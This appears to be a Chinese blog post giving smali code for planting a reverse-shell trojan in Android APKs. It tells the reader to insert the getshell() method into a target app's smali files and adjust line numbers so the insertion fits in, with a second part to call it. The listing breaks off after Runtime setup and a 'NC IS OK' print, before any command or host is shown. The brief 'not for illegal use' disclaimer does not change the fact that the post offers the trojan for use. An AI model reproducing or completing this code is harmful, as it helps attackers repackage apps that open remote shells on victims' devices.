向安卓APK smali源码中植入木马反弹SHELL的测试代码【请勿用于非法目的,切记!】
在安卓应用程序中植入木马已经不是什么新鲜事情,下面给出一个demo 反弹shell的一个smali源码,可以直接插入到目标应用的smali源码中,其中第一部分为函数体。注意修改其中的.line 行号。建议插入到一个smali文件的末尾,这样行号只要顺着原smali文件的行号增大即可。
然后使用第二部分的源码进行调用。
# virtual methods
.method public getshell()V
.registers 8
.prologue
.line 28
invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
move-result-object v1
.line 31
.local v1, rt:Ljava/lang/Runtime;
:try_start_4
sget-object v2, Ljava/lang/System;->out:Ljava/io/PrintStream;
const-string v3, “NC IS OK!!!!”
invoke-virtual {v2, v3}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V
.line 34
sget-object v2, Ljava/lang/System;->out:Ljava/io/PrintStream;
invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;</